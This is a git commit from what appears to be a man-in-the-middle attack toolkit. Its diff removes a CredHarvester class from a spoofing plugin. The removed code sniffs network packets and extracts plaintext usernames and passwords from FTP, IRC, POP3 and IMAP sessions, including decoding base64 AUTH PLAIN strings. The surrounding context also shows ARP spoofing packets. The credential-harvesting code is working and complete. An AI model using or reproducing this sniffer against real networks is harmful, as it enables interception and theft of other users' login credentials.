- Added Sniffer plugin

- Custom reactor options are now loaded dynamically from each plugin - Search engine query capture is now enabled with the sniffer plugin - Removed some useless comments and lib imports
2025-07-07 13:32:18 -07:00 · 2015-02-26 17:11:45 +01:00 · 2015-02-26 17:11:45 +01:00 · 0c6ac4fb1d
commit 0c6ac4fb1d
parent fc74e480eb
13 changed files with 814 additions and 213 deletions
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@ -361,137 +361,3 @@ class Spoof(Plugin):
            print '[*] Re-arping network'
            pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
            sendp(pkt, inter=1, count=5, iface=self.interface)
-
-class CredHarvester():
-
-    fragged = 0
-    imapauth = 0
-    popauth = 0
-    ftpuser = None # Necessary since user and pass come in separate packets
-    ircnick = None # Necessary since user and pass come in separate packets
-    # For concatenating fragmented packets
-    prev_pkt = {6667:{}, # IRC
-                143:{},  # IMAP
-                110:{},  # POP3
-                26:{},   # SMTP
-                25:{},   # SMTP
-                21:{}}   # FTP
-
-    def start(self, interface):
-        sniff(prn=self.pkt_sorter, iface=interface)
-
-    def pkt_sorter(self, pkt):
-        if pkt.haslayer(Raw) and pkt.haslayer(TCP):
-            self.dest    = pkt[IP].dst
-            self.src     = pkt[IP].src
-            self.dport   = pkt[TCP].dport
-            self.sport   = pkt[TCP].sport
-            self.ack     = pkt[TCP].ack
-            self.seq     = pkt[TCP].seq
-            self.load    = str(pkt[Raw].load)
-
-            if self.dport == 6667:
-                """ IRC """
-                port = 6667
-                self.header_lines = self.hb_parse(port) # Join fragmented pkts
-                return self.irc(port)
-
-            elif self.dport == 21 or self.sport == 21:
-                """ FTP """
-                port = 21
-                self.prev_pkt[port] = self.frag_joiner(port) # No headers in FTP so no need for hb_parse
-                self.ftp(port)
-
-            elif self.sport == 110 or self.dport == 110:
-                """ POP3 """
-                port = 110
-                self.header_lines = self.hb_parse(port) # Join fragmented pkts
-                self.mail_pw(port)
-
-            elif self.sport == 143 or self.dport == 143:
-                """ IMAP """
-                port = 143
-                self.header_lines = self.hb_parse(port) # Join fragmented pkts
-                self.mail_pw(port)
-
-    def headers_body(self, protocol):
-        try:
-            h, b = protocol.split("\r\n\r\n", 1)
-            return h, b
-        except Exception:
-            h, b = protocol, ''
-            return h, b
-
-    def frag_joiner(self, port):
-        self.fragged = 0
-        if len(self.prev_pkt[port]) > 0:
-            if self.ack in self.prev_pkt[port]:
-                self.fragged = 1
-                return {self.ack:self.prev_pkt[port][self.ack]+self.load}
-        return {self.ack:self.load}
-
-    def hb_parse(self, port):
-        self.prev_pkt[port] = self.frag_joiner(port)
-        self.headers, self.body = self.headers_body(self.prev_pkt[port][self.ack])
-        return self.headers.split('\r\n')
-
-    def mail_pw(self, port):
-        load = self.load.strip('\r\n')
-
-        if self.dport == 143:
-            auth_find = 'authenticate plain'
-            proto = 'IMAP'
-            auth = self.imapauth
-            self.imapauth = self.mail_pw_auth(load, auth_find, proto, auth, port)
-
-        elif self.dport == 110:
-            auth_find = 'AUTH PLAIN'
-            proto = 'POP'
-            auth = self.popauth
-            self.popauth = self.mail_pw_auth(load, auth_find, proto, auth, port)
-
-    def mail_pw_auth(self, load, auth_find, proto, auth, port):
-        if auth == 1:
-            user, pw = load, 0
-            logging.warning('[%s] %s auth: %s' % (self.src, proto, load))
-            self.b64decode(load, port)
-            return 0
-
-        elif auth_find in load:
-            return 1
-
-    def b64decode(self, load, port):
-        b64str = load
-        try:
-            decoded = b64decode(b64str).replace('\x00', ' ')[1:] # delete space at beginning
-        except Exception:
-            decoded = ''
-        # Test to see if decode worked
-        if '@' in decoded:
-            logging.debug('%s Decoded: %s' % (self.src, decoded))
-            decoded = decoded.split()
-
-    def ftp(self, port):
-        """Catch FTP usernames, passwords, and servers"""
-        load = self.load.replace('\r\n', '')
-
-        if port == self.dport:
-            if 'USER ' in load:
-                    user = load.strip('USER ')
-                    logging.warning('[%s > %s] FTP user:    ' % (self.src, self.dest), user)
-                    self.ftpuser = user
-
-            elif 'PASS ' in load:
-                    pw = load.strip('PASS ')
-                    logging.warning('[%s > %s] FTP password:' % (self.src, self.dest), pw)
-
-    def irc(self, port):
-        load = self.load.split('\r\n')[0]
-
-        if 'NICK ' in load:
-            self.ircnick = load.strip('NICK ')
-            logging.warning('[%s > %s] IRC nick: %s' % (self.src, self.dest, self.ircnick))
-
-        elif 'NS IDENTIFY ' in load:
-            ircpass = load.strip('NS IDENTIFY ')
-            logging.warning('[%s > %s] IRC password: %s' % (self.src, self.dest, ircpass))